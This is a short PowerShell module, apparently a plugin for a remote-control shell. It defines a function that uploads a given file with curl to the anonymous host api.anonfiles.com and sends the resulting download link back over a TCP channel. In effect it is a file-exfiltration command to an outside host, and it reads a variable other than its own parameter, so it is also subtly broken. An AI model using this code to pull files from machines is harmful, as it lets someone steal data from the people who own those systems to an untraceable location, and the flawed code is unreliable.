#n AnonFilesAPI
#v 2.0
#hStart anonupload
#
#	[FileName] - uploads a file to AnonFiles
#hEnd

function anonupload ($file)
{
	try { $file = $anonuploadfile.Replace("~", " ") } catch {}
	$link = cmd /c "curl -F "file=@$file" https://api.anonfiles.com/upload" | Select-String "full" -ErrorAction SilentlyContinue

	if ($link -ne $null) {WriteTCPMessage ("`nDownload Here: " + ([string]$link).Replace('"full":', "").Replace("\/", "/").Replace('"', "").Replace(",", "").Substring(5) + "`n")}
	else {WriteTCPMessage "`nNo Such File!`n"}
	
	Remove-Variable file, link -ErrorAction SilentlyContinue
}
